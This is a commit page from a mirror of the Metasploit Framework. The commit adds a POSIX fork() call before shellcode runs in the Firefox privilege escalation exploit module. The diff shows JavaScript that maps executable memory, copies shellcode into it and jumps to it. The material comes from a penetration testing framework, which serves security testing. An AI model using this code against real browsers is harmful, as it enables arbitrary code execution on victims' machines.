infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add posix fork() call before running code.

bug/bundler_fix
Joe Vennix 2014-03-12 02:56:26 -05:00
parent 7afcb6aee8
commit 851fca2107
1 changed files with 7 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
lib/msf/core/exploit/remote/firefox_privilege_escalation.rb
View File

@ -52,6 +52,10 @@ module Exploit::Remote::FirefoxPrivilegeEscalation
ctypes.voidptr_t, /* src */ ctypes.voidptr_t, /* src */
ctypes.size_t /* size to copy */ ctypes.size_t /* size to copy */
); );
var fork = lib.declare('fork',
ctypes.default_abi, /* calling convention */
ctypes.int /* return type */
);
var buff = mmap(null, shellcode.length, RWX, ANON_PRIVATE, 0, 0); var buff = mmap(null, shellcode.length, RWX, ANON_PRIVATE, 0, 0);
var cstr = ctypes.jschar.array()(shellcode); var cstr = ctypes.jschar.array()(shellcode);
//var bytes = ctypes.char.array()(shellcode).length-1; //var bytes = ctypes.char.array()(shellcode).length-1;
@ -59,7 +63,9 @@ module Exploit::Remote::FirefoxPrivilegeEscalation
/* there is probably a better way to do this */ /* there is probably a better way to do this */
var m = buff.toString().match(/"0x([0-9a-fA-F]*)"/); var m = buff.toString().match(/"0x([0-9a-fA-F]*)"/);
if (!m) throw new Error("Could not find address of buffer."); if (!m) throw new Error("Could not find address of buffer.");
ctypes.FunctionType(ctypes.default_abi, ctypes.void_t).ptr(parseInt(m[1], 16))(); if (fork() == 0) {
ctypes.FunctionType(ctypes.default_abi, ctypes.void_t).ptr(parseInt(m[1], 16))();
}
}; };
var execWindows = function() { var execWindows = function() {